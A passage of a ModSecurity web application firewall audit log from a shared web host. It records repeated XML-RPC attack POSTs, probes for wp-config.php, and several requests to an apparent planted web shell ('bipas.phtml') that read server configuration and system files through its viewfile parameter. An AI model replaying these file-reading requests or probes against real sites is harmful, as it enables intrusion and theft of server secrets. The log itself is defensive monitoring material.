alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFCkaVJfblPUQiSn5r2MHgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750115433986047 718424 (- - -) Stopwatch2: 1750115433986047 718424; combined=2119, p1=333, p2=1388, p3=59, p4=47, p5=178, sr=91, sw=114, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fc11434e-Z-- --9433ac0f-A-- [17/Jun/2025:04:42:26.579370 +0530] aFCk2ZVkCcfT-Z8NQYy_lwAAAAc 213.204.244.147 46452 127.0.0.1 7081 --9433ac0f-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 213.204.244.147 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 681 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: sv-SE,sv;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9433ac0f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --9433ac0f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFCk2ZVkCcfT-Z8NQYy_lwAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750115545914665 664779 (- - -) Stopwatch2: 1750115545914665 664779; combined=2146, p1=370, p2=1375, p3=77, p4=52, p5=171, sr=99, sw=101, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9433ac0f-Z-- --b321d24d-A-- [17/Jun/2025:04:44:01.306323 +0530] aFClOJVkCcfT-Z8NQYy_0QAAAAc 52.169.149.214 38970 127.0.0.1 7081 --b321d24d-B-- GET /wp-includes/css/wp-config.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 52.169.149.214 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check --b321d24d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.rsda.in/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --b321d24d-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.rsda.in"] [uri "/wp-includes/css/wp-config.php"] [unique_id "aFClOJVkCcfT-Z8NQYy_0QAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750115640938886 367524 (- - -) Stopwatch2: 1750115640938886 367524; combined=2094, p1=420, p2=1537, p3=0, p4=0, p5=136, sr=112, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b321d24d-Z-- --2177ac03-A-- [17/Jun/2025:04:46:40.695615 +0530] aFCl2FCTF37l_jAzt4oOPgAAAAU 52.169.149.214 46942 127.0.0.1 7081 --2177ac03-B-- GET /wp-config.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 52.169.149.214 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check --2177ac03-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --2177ac03-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.rsda.in"] [uri "/wp-config.php"] [unique_id "aFCl2FCTF37l_jAzt4oOPgAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750115800420612 275078 (- - -) Stopwatch2: 1750115800420612 275078; combined=2222, p1=366, p2=1660, p3=64, p4=42, p5=89, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2177ac03-Z-- --d2ae7f51-A-- [17/Jun/2025:04:47:23.551458 +0530] aFCmAgrsPejRtmHkrKLcEAAAAAE 213.204.244.147 45866 127.0.0.1 7081 --d2ae7f51-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 213.204.244.147 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 684 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: sv-SE,sv;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --d2ae7f51-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d2ae7f51-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFCmAgrsPejRtmHkrKLcEAAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750115842795856 755667 (- - -) Stopwatch2: 1750115842795856 755667; combined=2258, p1=361, p2=1468, p3=75, p4=52, p5=195, sr=104, sw=107, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d2ae7f51-Z-- --9b764c58-A-- [17/Jun/2025:04:47:30.820300 +0530] aFCmClCTF37l_jAzt4oOWQAAAAU 216.73.216.240 44860 127.0.0.1 7081 --9b764c58-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Fsecurity&viewfile=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fetc%2Fsecurity%2Fnamespace.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9b764c58-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3613 Connection: close Content-Type: text/html; charset=UTF-8 --9b764c58-H-- Message: Warning. Matched phrase "etc/security/namespace.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/namespace.conf found within ARGS:viewfile: /snap/core20/current/etc/security/namespace.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/namespace.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/namespace.conf found within ARGS:viewfile: /snap/core20/current/etc/security/namespace.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCmClCTF37l_jAzt4oOWQAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750115850815662 4695 (- - -) Stopwatch2: 1750115850815662 4695; combined=2218, p1=339, p2=1753, p3=38, p4=37, p5=50, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9b764c58-Z-- --c570f41f-A-- [17/Jun/2025:04:48:36.410558 +0530] aFCmTJWbMc1Q3J_M-mhEXQAAAAo 216.73.216.240 47462 127.0.0.1 7081 --c570f41f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fopt%2Fpsa%2Fadmin%2Fplib%2FService%2FNode&viewfile=%2F%2Fopt%2Fpsa%2Fadmin%2Fplib%2FService%2FNode%2FConfiguration.php HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --c570f41f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 5790 Connection: close Content-Type: text/html; charset=UTF-8 --c570f41f-H-- Message: Warning. Matched phrase "/configuration.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /configuration.php found within ARGS:viewfile: /opt/psa/admin/plib/service/node/configuration.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/configuration.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /configuration.php found within ARGS:viewfile: /opt/psa/admin/plib/service/node/configuration.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCmTJWbMc1Q3J_M-mhEXQAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750115916406366 4248 (- - -) Stopwatch2: 1750115916406366 4248; combined=2104, p1=329, p2=1653, p3=31, p4=33, p5=58, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c570f41f-Z-- --4bd66c28-A-- [17/Jun/2025:04:49:03.286532 +0530] aFCmZqRT9PYLci8mxb0pqwAAAAM 213.204.244.147 43336 127.0.0.1 7081 --4bd66c28-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 213.204.244.147 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 686 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: sv-SE,sv;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --4bd66c28-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --4bd66c28-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFCmZqRT9PYLci8mxb0pqwAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750115942428252 858347 (- - -) Stopwatch2: 1750115942428252 858347; combined=2398, p1=368, p2=1596, p3=74, p4=53, p5=190, sr=98, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4bd66c28-Z-- --adcd3815-A-- [17/Jun/2025:04:51:01.623631 +0530] aFCm3KRT9PYLci8mxb0qDAAAAAM 213.204.244.147 36506 127.0.0.1 7081 --adcd3815-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 213.204.244.147 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 683 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: sv-SE,sv;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --adcd3815-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --adcd3815-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFCm3KRT9PYLci8mxb0qDAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750116060765880 857823 (- - -) Stopwatch2: 1750116060765880 857823; combined=2541, p1=395, p2=1713, p3=66, p4=53, p5=197, sr=114, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --adcd3815-Z-- --02a4e017-A-- [17/Jun/2025:04:52:16.668831 +0530] aFCnJ1JfblPUQiSn5r2OEQAAAAA 116.179.33.81 35296 127.0.0.1 7081 --02a4e017-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 116.179.33.81 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 387 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Accept: */* Accept-Language: zh-CN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,fr;q=0.6 Content-Type: text/plain;charset=UTF-8 Cookie: _gcl_au=1.1.795031057.1750116134; _gid=GA1.2.1936106684.1750116134; _gat_UA-11096829-6=1; _ga=GA1.1.1906961933.1750116134; _ga_PETSZCXF5J=GS2.1.s1750116134$o1$g1$t1750116134$j60$l0$h0; _fbp=fb.1.1750116134679.386539321294474268 Origin: https://www.retaxis.com Referer: https://www.retaxis.com/ecommerce-website-design/ Accept-Encoding: gzip --02a4e017-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: _sfs_id=9bea2e33a02a76a2a050c8b5b40689051750116136; expires=Tue, 17 Jun 2025 00:22:16 GMT; Max-Age=3600; path=/; secure; HttpOnly Set-Cookie: PHPSESSID=t7gr3bgi9iv4pu9i3nnhp50c0f; expires=Sun, 14 Sep 2025 23:22:16 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --02a4e017-E-- --02a4e017-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aFCnJ1JfblPUQiSn5r2OEQAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aFCnJ1JfblPUQiSn5r2OEQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750116135303026 1365925 (- - -) Stopwatch2: 1750116135303026 1365925; combined=3646, p1=431, p2=2965, p3=106, p4=32, p5=111, sr=140, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache WebApp-Info: "default" "1750116134" "-" Engine-Mode: "DETECTION_ONLY" --02a4e017-Z-- --c777284e-A-- [17/Jun/2025:04:52:42.716051 +0530] aFCnQqRT9PYLci8mxb0qUgAAAAM 216.73.216.240 58620 127.0.0.1 7081 --c777284e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fusr%2Flocal%2Fpsa%2Fbootstrapper%2Fpp18.0.64-bootstrapper%2FUpgrader&viewfile=%2F%2Fusr%2Flocal%2Fpsa%2Fbootstrapper%2Fpp18.0.64-bootstrapper%2FUpgrader%2FConfig.php HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --c777284e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 10770 Connection: close Content-Type: text/html; charset=UTF-8 --c777284e-H-- Message: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /usr/local/psa/bootstrapper/pp18.0.64-bootstrapper/upgrader/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /usr/local/psa/bootstrapper/pp18.0.64-bootstrapper/upgrader/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCnQqRT9PYLci8mxb0qUgAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1750116162710272 5835 (- - -) Stopwatch2: 1750116162710272 5835; combined=2308, p1=336, p2=1847, p3=34, p4=38, p5=53, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c777284e-Z-- --b0841629-A-- [17/Jun/2025:04:53:02.093307 +0530] aFCnVaRT9PYLci8mxb0qbgAAAAM 213.204.244.147 54452 127.0.0.1 7081 --b0841629-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 213.204.244.147 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 686 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: sv-SE,sv;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --b0841629-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --b0841629-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFCnVaRT9PYLci8mxb0qbgAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750116181239750 853639 (- - -) Stopwatch2: 1750116181239750 853639; combined=2603, p1=388, p2=1799, p3=66, p4=61, p5=183, sr=98, sw=106, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b0841629-Z-- --cfea1f5c-A-- [17/Jun/2025:04:54:03.897640 +0530] aFCnk6C450Yw050Ymr0jCAAAAAk 213.204.244.147 47438 127.0.0.1 7081 --cfea1f5c-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 213.204.244.147 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 687 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: sv-SE,sv;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --cfea1f5c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --cfea1f5c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFCnk6C450Yw050Ymr0jCAAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750116243093267 804460 (- - -) Stopwatch2: 1750116243093267 804460; combined=2494, p1=461, p2=1622, p3=80, p4=54, p5=172, sr=110, sw=105, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cfea1f5c-Z-- --e8d25c62-A-- [17/Jun/2025:04:55:57.449579 +0530] aFCoBNdrHB-pK97UdV9aHQAAAAI 213.204.244.147 46832 127.0.0.1 7081 --e8d25c62-B-- POST /xmlrpc.php HTTP/1.0 